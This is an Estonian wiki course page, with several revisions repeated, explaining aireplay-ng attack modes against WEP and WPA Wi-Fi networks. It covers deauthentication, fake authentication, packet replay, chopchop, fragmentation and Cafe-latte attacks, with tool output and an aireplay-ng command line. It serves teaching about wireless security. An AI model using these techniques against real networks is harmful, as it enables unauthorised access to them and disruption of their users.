Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T08:54:02Z

Tliiv: /* Shared Key Authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidi''array''(pusle).[6]
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendab võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T08:53:39Z

Tliiv: /* Shared Key Authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile random baidiarray(pusle).[6]
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendab võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

